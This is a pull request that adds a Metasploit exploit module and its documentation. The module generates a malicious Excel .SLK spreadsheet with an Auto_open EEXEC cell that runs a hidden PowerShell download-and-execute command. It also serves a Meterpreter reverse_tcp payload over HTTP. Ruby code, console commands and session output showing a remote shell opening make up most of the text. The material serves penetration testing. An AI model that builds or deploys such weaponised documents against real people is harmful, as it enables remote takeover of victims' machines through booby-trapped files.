### PR TITLE
Add .SLK command execution for Microsoft Excel

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
+++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
@@ -1,0 +1,49 @@
+## Introduction
+
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
+on the target.
+
+## Vulnerable Application
+
+  Microsoft Excel
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/office_excel_slk`
+3. `set LHOST 192.168.x.x`
+4. `run`
+5. Execute generated file and press 'Enable Content' in Excel
+
+## Options
+
+  **FILENAME**
+
+  The name of the generated .slk file.
+
+## Scenarios
+
+  ```
+  msf > use exploit/windows/fileformat/office_excel_slk
+  msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf exploit(office_excel_slk) > set lhost 192.168.146.1
+  lhost => 192.168.146.1
+  msf exploit(office_excel_slk) > set srvhost 192.168.146.1
+  srvhost => 192.168.146.1
+  msf exploit(office_excel_slk) > run
+  [*] Exploit running as background job.
+
+  [*] Started reverse TCP handler on 192.168.146.1:4444
+  [+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
+  [*] Using URL: http://192.168.146.1:8080/default.hta
+  [*] Server started.
+  ```
+  Once the victim opens the file and clicks 'Enable Content' a session should spawn:
+  ```
+  [*] Sending stage (957487 bytes) to 192.168.146.145
+  [*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
+  ```

--- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
+++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
@@ -6,25 +6,26 @@ on the target.
 
 ## Vulnerable Application
 
-  Microsoft Excel
+  Microsoft Excel (tested on Excel 2016)
 
 ## Verification Steps
 
-  Example steps in this format (is also in the PR):
-
 1. Start `msfconsole`
 2. `use exploit/windows/fileformat/office_excel_slk`
-3. `set LHOST 192.168.x.x`
+3. `set LHOST [IP]`
+4. `set SRVHOST [IP]`
 4. `run`
-5. Execute generated file and press 'Enable Content' in Excel
+5. Open generated file and press 'Enable Content' in Excel
 
 ## Options
 
   **FILENAME**
 
-  The name of the generated .slk file.
+  The name of the generated .slk file. Default is a randomly generated file name.
 
 ## Scenarios
+
+### Microsoft Excel 2016 on Windows 10 Build 17763.288
 
   ```
   msf > use exploit/windows/fileformat/office_excel_slk

--- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
+++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
@@ -14,8 +14,8 @@ on the target.
 2. `use exploit/windows/fileformat/office_excel_slk`
 3. `set LHOST [IP]`
 4. `set SRVHOST [IP]`
-4. `run`
-5. Open generated file and press 'Enable Content' in Excel
+5. `run`
+6. Open generated file and press 'Enable Content' in Excel
 
 ## Options
 

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -57,7 +57,7 @@ class MetasploitModule  < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    if request.raw_uri.to_s.end_with? '.slk$'
+    if request.raw_uri.to_s.end_with? '.slk'
       print_status("Handling request for .slk from #{cli.peerhost}")
       payload = gen_psh("#{get_uri}", "string")
       data = create_slk(payload)

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -18,7 +18,9 @@ class MetasploitModule  < Msf::Exploit::Remote
               This module generates a download and execute powershell
               command to be placed in an .SLK Excel spreadsheet.
               When executed, it will retrieve a payload via HTTP
-              from a web server.
+              from a web server. When the file is opened, the 
+              user will be prompted to "Enable Content." Once
+              this is pressed, the payload will execute.
           },
           'Author' => [
             'Carter Brainerd (cbrnrd)', # Metasploit module
@@ -54,8 +56,8 @@ class MetasploitModule  < Msf::Exploit::Remote
       ])
   end
 
-  def on_request_uri(cli, _request)
-    if _request.raw_uri =~ /\.slk$/
+  def on_request_uri(cli, request)
+    if request.raw_uri.to_s.end_with? '.slk$'
       print_status("Handling request for .slk from #{cli.peerhost}")
       payload = gen_psh("#{get_uri}", "string")
       data = create_slk(payload)

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -50,7 +50,7 @@ class MetasploitModule  < Msf::Exploit::Remote
       ))
 
       register_options([
-          OptString.new('FILENAME', [true, "Filename to save as", "msf.slk"])
+          OptString.new('FILENAME', [true, "Filename to save as", "#{rand_text_alphanumeric 8}.slk"])
       ])
   end
 

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -16,7 +16,7 @@ class MetasploitModule  < Msf::Exploit::Remote
           'Name' => "Microsoft Excel .SLK Payload Delivery",
           'Description' => %Q{
               This module generates a download and execute powershell
-              command to be placed in an .SLK Excel spreadsheet. 
+              command to be placed in an .SLK Excel spreadsheet.
               When executed, it will retrieve a payload via HTTP
               from a web server.
           },
@@ -48,7 +48,7 @@ class MetasploitModule  < Msf::Exploit::Remote
               'EXITFUNC' => 'thread'
           }
       ))
-      
+
       register_options([
           OptString.new('FILENAME', [true, "Filename to save as", "msf.slk"])
       ])
@@ -72,7 +72,7 @@ class MetasploitModule  < Msf::Exploit::Remote
     end
   end
 
-  # I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell) 
+  # I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell)
   def gen_psh(url, *method)
     ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
 

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule  < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+      super(update_info(info,
+          'Name' => "Microsoft Excel .SLK Payload Delivery",
+          'Description' => %Q{
+              This module generates a download and execute powershell
+              command to be placed in an .SLK Excel spreadsheet. 
+              When executed, it will retrieve a payload via HTTP
+              from a web server.
+          },
+          'Author' => 'Carter Brainerd (cbrnrd)',
+          'License' => MSF_LICENSE,
+          'References' => [
+              ['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files']
+          ],
+          'Platform' => 'win', # idk about other platforms
+          'Stance' => Msf::Exploit::Stance::Aggressive,
+          'Targets' =>
+          [
+              ['Microsoft Excel', {} ]
+          ],
+          'DefaultTarget' => 0,
+          'Payload' => {
+              'DisableNops' => true
+          },
+          'DefaultOptions' => {
+              'DisablePayloadHandler' => false,
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+              'EXITFUNC' => 'thread'
+          }
+      ))
+      
+      register_options([
+          OptString.new('FILENAME', [true, "Filename to save as", "msf.slk"])
+      ])
+  end
+
+  # I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell) 
+  def gen_psh(url, *method)
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+
+    if method.include? 'string'
+      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+    else
+      # Random filename to use, if there isn't anything set
+      random = "#{rand_text_alphanumeric 8}.exe"
+      # Set filename (Use random filename if empty)
+      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
+
+      # Set path (Use %TEMP% if empty)
+      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
+
+      # Join Path and Filename
+      file = %Q(echo (#{path}+'\\#{filename}'))
+
+      # Generate download PowerShell command
+      download_string = Rex::Powershell::PshMethods.download_run(url, file)
+    end
+
+    download_and_run = "#{ignore_cert}#{download_string}"
+
+    # Generate main PowerShell command
+    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+  end
+
+  def create_slk
+    content = "ID;P\n"
+    content << "O;E\n"
+    content << "NN;NAuto_open;ER101C1;KOut Flank;F\n"
+    content << "C;X1;Y101;EEXEC(\"#{gen_psh}\")\n" # Execute stager
+    content << "C;X1;Y102;EHALT()\n"
+    content << "E"
+    content
+  end
+
+  def primer
+    file_create(create_slk)
+  end
+end

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -20,10 +20,16 @@ class MetasploitModule  < Msf::Exploit::Remote
               When executed, it will retrieve a payload via HTTP
               from a web server.
           },
-          'Author' => 'Carter Brainerd (cbrnrd)',
+          'Author' => [
+            'Carter Brainerd (cbrnrd)', # Metasploit module
+            'Stan Hegt (@StanHacked)', # Discovery
+            'Pieter Ceelen (@ptrpieter)' # Discovery
+          ],
           'License' => MSF_LICENSE,
           'References' => [
-              ['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files']
+              ['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files'],
+              ['URL', 'https://www.twitter.com/StanHacked/status/1049047727403937795'],
+              ['URL', 'http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen']
           ],
           'Platform' => 'win', # idk about other platforms
           'Stance' => Msf::Exploit::Stance::Aggressive,
@@ -31,6 +37,7 @@ class MetasploitModule  < Msf::Exploit::Remote
           [
               ['Microsoft Excel', {} ]
           ],
+          'DisclosureDate' => 'Oct 7 2018',
           'DefaultTarget' => 0,
           'Payload' => {
               'DisableNops' => true

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -18,7 +18,7 @@ class MetasploitModule  < Msf::Exploit::Remote
               This module generates a download and execute powershell
               command to be placed in an .SLK Excel spreadsheet.
               When executed, it will retrieve a payload via HTTP
-              from a web server. When the file is opened, the 
+              from a web server. When the file is opened, the
               user will be prompted to "Enable Content." Once
               this is pressed, the payload will execute.
           },

--- a/modules/exploits/windows/fileformat/office_excel_slk.rb
+++ b/modules/exploits/windows/fileformat/office_excel_slk.rb
@@ -47,6 +47,24 @@ class MetasploitModule  < Msf::Exploit::Remote
       ])
   end
 
+  def on_request_uri(cli, _request)
+    if _request.raw_uri =~ /\.slk$/
+      print_status("Handling request for .slk from #{cli.peerhost}")
+      payload = gen_psh("#{get_uri}", "string")
+      data = create_slk(payload)
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+    else
+      print_status("Delivering payload to #{cli.peerhost}...")
+      p = regenerate_payload(cli)
+      data = cmd_psh_payload(p.encoded,
+                       payload_instance.arch.first,
+                       remove_comspec: true,
+                       exec_in_place: true
+      )
+      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
+    end
+  end
+
   # I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell) 
   def gen_psh(url, *method)
     ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
@@ -75,17 +93,17 @@ class MetasploitModule  < Msf::Exploit::Remote
     return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
   end
 
-  def create_slk
+  def create_slk(cmd)
     content = "ID;P\n"
     content << "O;E\n"
     content << "NN;NAuto_open;ER101C1;KOut Flank;F\n"
-    content << "C;X1;Y101;EEXEC(\"#{gen_psh}\")\n" # Execute stager
+    content << "C;X1;Y101;EEXEC(\"#{cmd}\")\n" # Execute command
     content << "C;X1;Y102;EHALT()\n"
     content << "E"
     content
   end
 
   def primer
-    file_create(create_slk)
+    file_create(create_slk(gen_psh("#{get_uri}", 'string')))
   end
 end


### PR DESCRIPTION
This adds a module that leverages a Microsoft Excel .slk file's ability to execute local commands. 

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/fileformat/office_excel_slk`
- [x] `set LHOST 192.168.x.x`
- [x] `run`
- [x] Execute generated file and press 'Enable Content' in Excel

## Tested on 
* Excel 2016 (win 10)

This may be able to work on other platforms if the command was changed on a per-platform basis. I'm sure we can do this on the module side, but I'm not sure that would be of any use if the user doesn't know the OS of the client.
